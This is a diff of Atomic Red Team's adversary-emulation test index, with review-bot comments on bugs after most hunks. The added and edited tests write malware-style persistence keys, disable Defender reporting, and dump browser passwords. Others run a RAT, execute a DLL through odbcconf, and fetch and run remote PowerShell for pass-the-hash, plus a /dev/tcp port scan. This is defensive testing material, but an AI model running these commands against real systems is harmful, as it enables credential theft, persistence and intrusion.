+ - Atomic Test #41: Terminal Server Client Connection History Cleared [windows]
+ - Atomic Test #42: Disable Windows Error Reporting Settings [windows]
+ - Atomic Test #43: DisallowRun Execution Of Certain Application [windows]
- T1574.008 Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.001 Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484.001 Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -231,6 +236,7 @@
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.008 Odbcconf](../../T1218.008/T1218.008.md)
- Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
+ - Atomic Test #2: Odbcconf.exe - Load Response File [windows]
- T1045 Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1142,6 +1148,7 @@
- Atomic Test #11: WinPwn - BrowserPwn [windows]
- Atomic Test #12: WinPwn - Loot local Credentials - mimi-kittenz [windows]
- Atomic Test #13: WinPwn - PowerSharpPack - Sharpweb for Browser Credentials [windows]
+ - Atomic Test #15: WebBrowserPassView - Credentials from Browser [windows]
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #1: Private Keys [windows]
@@ -1440,6 +1447,7 @@
- Atomic Test #5: ScreenConnect Application Download and Install on Windows [windows]
- Atomic Test #6: Ammyy Admin Software Execution [windows]
- Atomic Test #7: RemotePC Software Execution [windows]
+ - Atomic Test #8: NetSupport - RAT Execution [windows]
- T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 3263a033..132b86af 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -10555,6 +10555,105 @@ defense-evasion:
'
name: command_prompt
elevation_required: true
+ - name: NetWire RAT Registry Key Creation
+ auto_generated_guid: 65704cd4-6e36-4b90-b6c1-dc29a82c8e56
+ description: |
+ NetWire continues to create its home key (HKCU\SOFTWARE\NetWire) as well as adding it into the auto-run group in the victim’s registry.
+ See how NetWire malware - https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NetWire /t REG_SZ /d "C:\Users\admin\AppData\Roaming\Install\Host.exe" /f
+ reg add HKCU\SOFTWARE\NetWire /v HostId /t REG_SZ /d HostId-kai6Ci /f
+ reg add HKCU\SOFTWARE\NetWire /v "Install Date" /t REG_SZ /d "2021-08-30 07:17:27" /f
+ cleanup_command: |
+ reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NetWire /f >nul 2>&1
+ reg delete HKCU\SOFTWARE\NetWire /va /f >nul 2>&1
+ reg delete HKCU\SOFTWARE\NetWire /f >nul 2>&1
+ name: command_prompt
+ elevation_required: true
+ - name: Ursnif Malware Registry Key Creation
+ auto_generated_guid: c375558d-7c25-45e9-bd64-7b23a97c1db0
+ description: |
+ Ursnif downloads additional modules from the C&C server and saves these in the registry folder HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\
+ More information - https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/
+ supported_platforms:
+ - windows
+ executor:
+ command: 'reg add HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4
+ /v comsxRes /t REG_BINARY /d 72656463616e617279 /f
+
+ '
+ cleanup_command: |
+ reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /va /f >nul 2>&1
+ reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /f >nul 2>&1
+ name: command_prompt
+ elevation_required: true
+ - name: Terminal Server Client Connection History Cleared
+ auto_generated_guid: 3448824b-3c35-4a9e-a8f5-f887f68bea21
+ description: 'The built-in Windows Remote Desktop Connection (RDP) client (mstsc.exe)
+ saves the remote computer name (or IP address) and the username that is used
+ to login after each successful connection to the remote computer
+
+ '
+ supported_platforms:
+ - windows
+ dependency_executor_name: powershell
+ dependencies:
+ - description: "Must have the \"MR9\" Remote Desktop Connection history Key
+ \n"
+ prereq_command: 'if ((Get-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Terminal
+ Server Client\Default\").MR9) {exit 0} else {exit 1}
+
+ '
+ get_prereq_command: |
+ New-Item -path "HKCU:\SOFTWARE\Microsoft\" -name "Terminal Server Client" -ErrorAction Ignore
+ New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\" -name "Default" -ErrorAction Ignore
+ New-Itemproperty -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Default" -name "MR9" -value "127.0.0.1" -PropertyType "String" -ErrorAction Ignore
+ New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\" -name "Servers" -ErrorAction Ignore
+ New-Item -path "HKCU:\SOFTWARE\Microsoft\Terminal Server Client\Servers" -name "Redcanary" -ErrorAction Ignore
+ executor:
+ command: |
+ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
+ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
+ name: command_prompt
+ elevation_required: true
+ - name: Disable Windows Error Reporting Settings
+ auto_generated_guid: d2c9e41e-cd86-473d-980d-b6403562e3e1
+ description: "Modify the registry of the currently logged in user using reg.exe
+ via cmd console to disable windows error reporting settings. This Windows
+ feature allow the use to report bug, errors, failure or problems \nencounter
+ in specific application or process.\nSee how azorult malware abuses this technique-
+ https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/\n"
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ reg add HKLM64\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
+ reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
+ cleanup_command: |
+ reg delete HKLM64\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /f >nul 2>&1
+ reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /f >nul 2>&1
+ name: command_prompt
+ elevation_required: true
+ - name: DisallowRun Execution Of Certain Application
+ auto_generated_guid: 71db768a-5a9c-4047-b5e7-59e01f188e84
+ description: "Modify the registry of the currently logged in user using reg.exe
+ via cmd console to prevent user running specific computer programs that could
+ aid them in manually removing malware or detecting it \nusing security product.\nSee
+ how azorult malware abuses this technique- https://app.any.run/tasks/a6f2ffe2-e6e2-4396-ae2e-04ea0143f2d8/\n"
+ supported_platforms:
+ - windows
+ executor:
+ command: |
+ reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /t REG_DWORD /d 1 /f
+ reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
+ cleanup_command: |
+ reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisallowRun /f >nul 2>&1
+ reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /v 1 /f >nul 2>&1
+ name: command_prompt
+ elevation_required: true
T1574.008:
technique:
x_mitre_platforms:
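Review bot: The cleanup of `DisallowRun Execution Of Certain Application` does not undo what its executor wrote: the second `reg add` creates a value named `DisableEnhancedNotifications` under `Explorer\DisallowRun` (apparently carried over from the previous test, since DisallowRun values are normally numbered), while the cleanup runs `reg delete ...\Explorer\DisallowRun /v 1 /f`, so both the value and the `DisallowRun` key survive; `reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun /f >nul 2>&1` would remove the key with whatever was written under it. In `Disable Windows Error Reporting Settings` the description speaks of the current user's Windows Error Reporting settings, but the commands write `DisableEnhancedNotifications` under `HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting`, and `HKLM64` does not appear among the root keys reg.exe accepts (it documents `/reg:64` for the 64-bit view) — either the description or the keys need correcting, and the first line should be verified on a real host. `Terminal Server Client Connection History Cleared` deletes the user's genuine `Default` values and the entire `Servers` key, not just the `MR9`/`Redcanary` fixtures its prereq created, and has no cleanup_command; a `reg export "HKCU\Software\Microsoft\Terminal Server Client" "%temp%\<TECHNIQUE_ID>_tsc_backup.reg" /y` before the deletes and a matching `reg import` in cleanup, as the screensaver hunks in this diff do, would restore the operator's real RDP history. The T1112 test list these entries extend begins before the hunk.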
@@ -12223,6 +12322,39 @@ defense-evasion:
'
name: command_prompt
+ - name: Odbcconf.exe - Load Response File
+ auto_generated_guid: 331ce274-f9c9-440b-9f8c-a1006e1fce0b
+ description: |
+ Execute arbitrary response file that will spawn PowerShell.exe.
+ Source files: https://github.com/woanware/application-restriction-bypasses
+ supported_platforms:
+ - windows
+ input_arguments:
+ rsp_file_name:
+ description: Response file name to load
+ type: String
+ default: T1218.008.rsp
+ rsp_file_path:
+ description: Response file path
+ type: String
+ default: PathToAtomicsFolder\T1218.008\bin\
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'T1218.008.rsp must exist on disk at specified location (#{rsp_file_path}#{rsp_file_name})
+
+ '
+ prereq_command: 'if (Test-Path #{rsp_file_path}#{rsp_file_name}) {exit 0}
+ else {exit 1}
+
+ '
+ get_prereq_command: |
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/bin/T1218.008.rsp" -OutFile "#{rsp_file_path}#{rsp_file_name}"
+ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/bin/o.dll" -OutFile "#{rsp_file_path}\o.dll"
+ executor:
+ command: |
+ cd #{rsp_file_path}
+ odbcconf.exe -f #{rsp_file_name}
+ name: command_prompt
T1144:
technique:
x_mitre_platforms:
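Review bot: The dependency check for `Odbcconf.exe - Load Response File` verifies only the `.rsp` file, although `get_prereq_command` also fetches `o.dll` beside it and the response file presumably references that DLL, so a missing DLL passes the prereq and the test fails at execution time; extend the check, e.g. `prereq_command: 'if ((Test-Path "#{rsp_file_path}#{rsp_file_name}") -and (Test-Path "#{rsp_file_path}o.dll")) {exit 0} else {exit 1}'`. The second download writes to `"#{rsp_file_path}\o.dll"`, which with the default path already ending in `\` yields a doubled backslash — tolerated by Windows but inconsistent with the first download line. `cd #{rsp_file_path}` and `odbcconf.exe -f #{rsp_file_name}` should quote their arguments so an atomics folder containing spaces still works. The T1218.008 entry this test is appended to begins before the hunk.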
@@ -23263,7 +23395,7 @@ defense-evasion:
executor:
command: |-
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
- IEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command}
+ IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command}
name: powershell
T1574.002:
technique:
@@ -37337,12 +37469,17 @@ privilege-escalation:
default: C:\Windows\System32\cmd.exe
executor:
command: |
+ reg export "HKEY_CURRENT_USER\Control Panel\Desktop" %userprofile%\backup.reg
copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr"
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f
shutdown /r /t 0
+ cleanup_command: |
+ reg import %userprofile%\backup.reg
+ del %userprofile%\backup.reg
+ del %SystemRoot%\System32\evilscreensaver.scr
name: command_prompt
elevation_required: true
T1543.001:
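Review bot: `reg export "HKEY_CURRENT_USER\Control Panel\Desktop" %userprofile%\backup.reg` prompts for confirmation whenever `backup.reg` already exists (a second run, or a user's own file of that name), which stalls a non-interactive execution and, if confirmed, overwrites the user's file; add `/y` and use a test-specific name, e.g. `reg export "HKEY_CURRENT_USER\Control Panel\Desktop" "%temp%\<TECHNIQUE_ID>_desktop_backup.reg" /y`, with the `reg import` and `del` lines in cleanup_command pointing at the same quoted path. Because `shutdown /r /t 0` follows immediately, cleanup can only run after the reboot, so the backup must live on a persistent path rather than anything the runner cleans up between invocations. The identical lines appear in the persistence copy of this test at the `@@ -59472,12 +59616,17 @@` hunk. The enclosing test entry starts before the hunk.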
@@ -44351,13 +44488,16 @@ execution:
prereq_command: 'if [ -f #{autosuid} ]; then exit 0; else exit 1; fi;
'
- get_prereq_command: 'curl #{autosuid_url} --output #{autosuid}
+ get_prereq_command: 'curl --create-dirs #{autosuid_url} --output #{autosuid}
'
executor:
command: |
chmod +x #{autosuid}
bash #{autosuid}
+ cleanup_command: 'rm -rf #{autosuid}
+
+ '
name: sh
- name: LinEnum tool execution
auto_generated_guid: a2b35a63-9df1-4806-9a4d-5fe0500845f2
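Review bot: `cleanup_command: 'rm -rf #{autosuid}'` applies a recursive, forced delete to a caller-supplied path; the prereq treats `#{autosuid}` as a regular file (`[ -f ... ]`), so `rm -f #{autosuid}` does the same job without recursing into a directory if the argument is ever mis-set. `curl --create-dirs #{autosuid_url} --output #{autosuid}` still saves an HTTP error page or redirect stub as the script on a failed request, after which the `-f` prereq passes and `bash #{autosuid}` executes garbage; `curl -fsSL --create-dirs #{autosuid_url} --output #{autosuid}` makes a failed download leave no file behind. Both points apply equally to the LinEnum hunk at `@@ -44386,13 +44526,16 @@` and to the two hunks of atomics/T1059.004/T1059.004.yaml. The entry starts before the hunk.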
@@ -44386,13 +44526,16 @@ execution:
prereq_command: 'if [ -f #{linenum} ]; then exit 0; else exit 1; fi;
'
- get_prereq_command: 'curl #{linenum_url} --output #{linenum}
+ get_prereq_command: 'curl --create-dirs #{linenum_url} --output #{linenum}
'
executor:
command: |
chmod +x #{linenum}
bash #{linenum}
+ cleanup_command: 'rm -rf #{linenum}
+
+ '
name: sh
T1559:
technique:
@@ -45000,9 +45143,10 @@ execution:
'
executor:
command: |-
- python -c "import pty;pty.spawn('/bin/sh')"
+ which_python=$(which python || which python3 || which python2)
+ $which_python -c "import pty;pty.spawn('/bin/sh')"
exit
- python -c "import pty;pty.spawn('/bin/bash')"
+ $which_python -c "import pty;pty.spawn('/bin/bash')"
exit
name: bash
T1569:
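Review bot: `which_python=$(which python || which python3 || which python2)` leaves `which_python` empty when no interpreter is found, so the following line runs `-c` as the command and fails with an unrelated "command not found"; a guard such as `[ -n "$which_python" ] || { echo "no python interpreter found" >&2; exit 1; }` makes the failure explicit. `which` is not guaranteed by POSIX and its failure output varies by platform, whereas `command -v` is, so `which_python=$(command -v python || command -v python3 || command -v python2)` is the more portable line. The same change appears in atomics/T1059.006/T1059.006.yaml at `@@ -164,8 +164,9 @@`.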
@@ -59472,12 +59616,17 @@ persistence:
default: C:\Windows\System32\cmd.exe
executor:
command: |
+ reg export "HKEY_CURRENT_USER\Control Panel\Desktop" %userprofile%\backup.reg
copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr"
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f
reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f
shutdown /r /t 0
+ cleanup_command: |
+ reg import %userprofile%\backup.reg
+ del %userprofile%\backup.reg
+ del %SystemRoot%\System32\evilscreensaver.scr
name: command_prompt
elevation_required: true
T1543.001:
@@ -64132,6 +64281,48 @@ collection:
Invoke-EnumerateAzureBlobs -base #{base} -permutations #{wordlist} -outputfile "#{output_file}"
cleanup_command: 'remove-item #{output_file} -erroraction silentlycontinue
+ '
+ name: powershell
+ - name: Azure - Scan for Anonymous Access to Azure Storage (Powershell)
+ auto_generated_guid: 146af1f1-b74e-4aa7-9895-505eb559b4b0
+ description: "Upon successful execution, this test will test for anonymous access
+ to Azure storage containers by invoking a web request and outputting the results
+ to a file. \nThe corresponding response could then be interpreted to determine
+ whether or not the resource/container exists, as well as other information.
+ \nSee https://ninocrudele.com/the-three-most-effective-and-dangerous-cyberattacks-to-azure-and-countermeasures-part-2-attack-the-azure-storage-service
+ \ \n"
+ supported_platforms:
+ - iaas:azure
+ input_arguments:
+ base_name:
+ description: Azure storage account name to test
+ type: String
+ default: T1530Test2
+ output_file:
+ description: File to output results to
+ type: String
+ default: "$env:temp\\T1530Test2.txt"
+ container_name:
+ description: Container name to search for (optional)
+ type: String
+ default:
+ blob_name:
+ description: Blob name to search for (optional)
+ type: String
+ default:
+ executor:
+ command: |
+ try{$response = invoke-webrequest "https://#{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}" -method "GET"}
+ catch [system.net.webexception]
+ {if($_.Exception.Response -ne $null)
+ {$Response = $_.Exception.Response.GetResponseStream()
+ $ReadResponse = New-Object System.IO.StreamReader($Response)
+ $ReadResponse.BaseStream.Position = 0
+ $responseBody = $ReadResponse.ReadToEnd()}
+ else {$responseBody = "The storage account could not be anonymously accessed."}}
+ "Response received for #{base_name}.blob.core.windows.net/#{container_name}/#{blob_name}: $responsebody" | out-file -filepath #{output_file} -append
+ cleanup_command: 'remove-item #{output_file} -erroraction silentlycontinue
+
'
name: powershell
T1074.002:
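Review bot: In `Azure - Scan for Anonymous Access to Azure Storage (Powershell)` the success path never sets `$responseBody`: the `try` stores the result in `$response` and only the `catch` branch assigns `$responseBody`, so an anonymously readable container — the condition the test exists to surface — is written to `#{output_file}` as `Response received for ...: ` with an empty body; set it inside the try, e.g. `try{$response = invoke-webrequest "..." -method "GET"; $responseBody = $response.Content}`. The `catch [system.net.webexception]` filter only matches Windows PowerShell; on PowerShell 7 `Invoke-WebRequest` raises `Microsoft.PowerShell.Commands.HttpResponseException`, so the error escapes uncaught and nothing is logged — a second catch clause for that type, or catching the base exception, covers both hosts. `container_name` and `blob_name` default to empty, which the URL template turns into `https://<account>.blob.core.windows.net//`; the description should say what a bare-account probe reports versus a container probe so the output is interpretable. The hunk starts inside the previous test's cleanup_command.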
@@ -68322,7 +68513,7 @@ lateral-movement:
executor:
command: |-
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
- IEX (IWR 'https://github.com/Kevin-Robertson/Invoke-TheHash/blob/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command}
+ IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command}
name: powershell
T1021.001:
technique:
@@ -72921,6 +73112,40 @@ credential-access:
rm "/tmp/T1555.003_Login Data" >/dev/null 2>&1
rm "/tmp/T1555.003_Login Data For Account" >/dev/null 2>&1
name: sh
+ - name: WebBrowserPassView - Credentials from Browser
+ auto_generated_guid: e359627f-2d90-4320-ba5e-b0f878155bbe
+ description: The following Atomic test utilizes WebBrowserPassView to extract
+ passwords from browsers on a Window system. WebBrowserPassView is an open
+ source application used to retrieve passwords stored on a local computer.
+ Recently noticed as a tool used in the BlackCat Ransomware.
+ supported_platforms:
+ - windows
+ input_arguments:
+ webbrowserpassview_path:
+ description: 'Path to the WebBrowserPassView executable '
+ type: String
+ default: PathToAtomicsFolder\T1555.003\bin\WebBrowserPassView.exe
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Check if WebBrowserPassView.exe exists in the specified path
+ #{webbrowserpassview_path}
+
+ '
+ prereq_command: 'if (Test-Path #{webbrowserpassview_path}) {exit 0} else {exit
+ 1}
+
+ '
+ get_prereq_command: 'Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1555.003/bin/WebBrowserPassView.exe
+ -OutFile #{webbrowserpassview_path}
+
+ '
+ executor:
+ command: |
+ Start-Process #{webbrowserpassview_path}
+ Start-Sleep -Second 4
+ Stop-Process -Name "WebBrowserPassView"
+ name: powershell
+ elevation_required: true
T1557.003:
technique:
x_mitre_platforms:
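Review bot: `Start-Sleep -Second 4` only works through PowerShell's partial parameter matching (the parameter is `-Seconds`), and `Stop-Process -Name "WebBrowserPassView"` has no `-ErrorAction`, so the test is reported as failed whenever the process has already exited before the sleep ends; suggested lines are `Start-Sleep -Seconds 4` and `Stop-Process -Name "WebBrowserPassView" -Force -ErrorAction SilentlyContinue`. The input description carries a stray trailing space in `'Path to the WebBrowserPassView executable '` and the test description says "on a Window system" where "Windows" is meant. The description should also note that endpoint protection may quarantine this binary, in which case the `Test-Path` prereq fails immediately after `get_prereq_command` appears to succeed. The T1555.003 test list this entry is appended to begins before the hunk.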
@@ -74935,7 +75160,7 @@ credential-access:
executor:
command: |
findstr /si pass *.xml *.doc *.txt *.xls
- ls -R | select-string -Pattern password
+ ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
name: powershell
- name: Access unattend.xml
auto_generated_guid: 367d4004-5fc0-446d-823f-960c74ae52c3
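Review bot: Placing `-ErrorAction SilentlyContinue` on `select-string` only suppresses errors that cmdlet raises; the access-denied errors produced while `ls -R` recurses into unreadable directories are emitted by `Get-ChildItem` itself and still surface, so both cmdlets need it: `ls -R -ErrorAction SilentlyContinue | select-string -ErrorAction SilentlyContinue -Pattern password`. The enclosing test entry starts before the hunk.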
@@ -78858,7 +79083,7 @@ discovery:
computer_name:
description: Name of remote system to query
type: String
- default: "$env:COMPUTERNAME"
+ default: "%COMPUTERNAME%"
executor:
command: 'query user /SERVER:#{computer_name}
@@ -80308,7 +80533,7 @@ discovery:
'
get_prereq_command: "sudo #{package_installer} \n"
executor:
- command: 'smbstatus --shares
+ command: 'sudo smbstatus --shares
'
name: bash
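Review bot: Hard-coding `sudo` into `command: 'sudo smbstatus --shares'` assumes a passwordless sudoers entry; where one is absent the command blocks on a password prompt in a non-interactive run instead of failing. `sudo -n smbstatus --shares` fails fast in that case, and if the entry does not already set `elevation_required: true` (not visible in the hunk) it should, so the runner reports the requirement up front. The same applies to `sudo nmap -sS #{network_range} -p #{port}` in the hunk at `@@ -84179,7 +84472,7 @@` and in atomics/T1046/T1046.yaml at `@@ -61,7 +63,7 @@`.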
@@ -80883,6 +81108,70 @@ discovery:
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Seatbelt.ps1')
Invoke-Seatbelt -Command "-group=all"; pause
name: powershell
+ - name: Azure Security Scan with SkyArk
+ auto_generated_guid: 26a18d3d-f8bc-486b-9a33-d6df5d78a594
+ description: "Upon successful execution, this test will utilize a valid read-only
+ Azure AD user's credentials to conduct a security scan and determine what
+ users exist in a given tenant, as well as identify any admin users. \nOnce
+ the test is complete, a folder will be output to the temp directory that contains
+ 3 csv files which provide info on the discovered users. \nSee https://github.com/cyberark/SkyArk
+ \n"
+ supported_platforms:
+ - azure-ad
+ input_arguments:
+ username:
+ description: Azure AD username
+ type: String
+ default:
+ password:
+ description: Azure AD password
+ type: String
+ default: T1082Az
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'The SkyArk AzureStealth module must exist in $env:temp.
+
+ '
+ prereq_command: 'if (test-path $env:temp\AzureStealth.ps1){exit 0} else {exit
+ 1}
+
+ '
+ get_prereq_command: 'invoke-webrequest "https://raw.githubusercontent.com/cyberark/SkyArk/3293ee145e95061a8980dd7b5da0030edc4da5c0/AzureStealth/AzureStealth.ps1"
+ -outfile "$env:temp\AzureStealth.ps1"
+
+ '
+ - description: 'The AzureAD module must be installed.
+
+ '
+ prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue)
+ {exit 0} else {exit 1}} catch {exit 1}
+
+ '
+ get_prereq_command: 'Install-Module -Name AzureAD -Force
+
+ '
+ - description: 'The Az module must be installed.
+
+ '
+ prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+ {exit 0} else {exit 1}} catch {exit 1}
+
+ '
+ get_prereq_command: 'Install-Module -Name Az -Force
+
+ '
+ executor:
+ command: "Import-Module $env:temp\\AzureStealth.ps1 -force \n$Password
+ = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential
+ = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList
+ \"#{username}\", $Password\nConnect-AzAccount -Credential $Credential\nConnect-AzureAD
+ -Credential $Credential\nScan-AzureAdmins -UseCurrentCred\n"
+ cleanup_command: |
+ $resultstime = Get-Date -Format "yyyyMMdd"
+ $resultsfolder = ("Results-" + $resultstime)
+ remove-item $env:temp\$resultsfolder -recurse -force -erroraction silentlycontinue
+ name: powershell
+ elevation_required: true
T1010:
technique:
x_mitre_platforms:
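Review bot: `password` defaults to the literal `T1082Az` while `username` defaults to empty; a committed literal password reads as a real credential and silently pairs with whatever username the operator supplies, so it should be empty as well (`default:`) so that both values must be provided explicitly. The cleanup recomputes the folder name as `"Results-" + (Get-Date -Format "yyyyMMdd")` at cleanup time, so a scan that started before midnight is never removed; computing the name once in the executor, or removing `$env:temp\Results-*`, avoids the race. The same test is added verbatim in atomics/T1082/T1082.yaml at `@@ -274,3 +274,54 @@`, where the username default is spelled `default: null` — the two files should agree on one spelling. The T1082 test list this entry joins begins before the hunk.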
@@ -84120,13 +84409,17 @@ discovery:
supported_platforms:
- linux
- macos
+ input_arguments:
+ host:
+ description: Host to scan.
+ type: String
+ default: 192.168.1.1
executor:
- command: |
- for port in {1..65535};
- do
- echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ;
- done
- name: sh
+ command: 'for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port)
+ && echo port $port is open ; done
+
+ '
+ name: bash
- name: Port Scan Nmap
auto_generated_guid: 515942b0-a09f-4163-a7bb-22fefb6f185f
description: |
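Review bot: The new `host` argument defaults to `192.168.1.1`, so a run without `-InputArgs` probes all 65535 ports of whatever device holds that address on the operator's network — frequently a router the tester does not own; `default: 127.0.0.1` keeps the default run on the host executing the test and the rewritten loop behaves the same. Each `echo >/dev/tcp/#{host}/$port` attempt waits for the full TCP connect timeout on a filtered port, so against a host that drops packets the fixed `{1..65535}` range can run for hours; the description should say so, or the range should become a second input argument. The switch to `name: bash` is correct since `/dev/tcp` is a bash feature, and the `2>/dev/null` placed before `echo` is a valid redirection position. The same lines recur in atomics/T1046/T1046.yaml at `@@ -10,13 +10,15 @@`.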
@@ -84179,7 +84472,7 @@ discovery:
apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y telnet)\n"
executor:
command: |
- nmap -sS #{network_range} -p #{port}
+ sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
name: sh
@@ -87541,6 +87834,41 @@ command-and-control:
-Name \"RPCService\" -force -erroraction silentlycontinue\n"
name: powershell
elevation_required: true
+ - name: NetSupport - RAT Execution
+ auto_generated_guid: ecca999b-e0c8-40e8-8416-ad320b146a75
+ description: "A recent trend by threat actors, once a foothold is established,
+ maintain long term persistence using third party remote services such as NetSupport
+ to provide the operator with access to the network using legitimate services.
+ \n"
+ supported_platforms:
+ - windows
+ input_arguments:
+ NetSupport_Path:
+ description: Path to the NetSupport executable.
+ type: Path
+ default: "$env:temp\\T1219Setup.exe"
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'NetSupport must be downloaded and exist on the disk at the specified
+ location. (#{NetSupport_Path})
+
+ '
+ prereq_command: 'if (Test-Path #{NetSupport_Path}) {exit 0} else {exit 1}
+
+ '
+ get_prereq_command: 'Start-BitsTransfer -Source "https://nsproducts.azureedge.net/nsm-1270/en/Setup.exe"
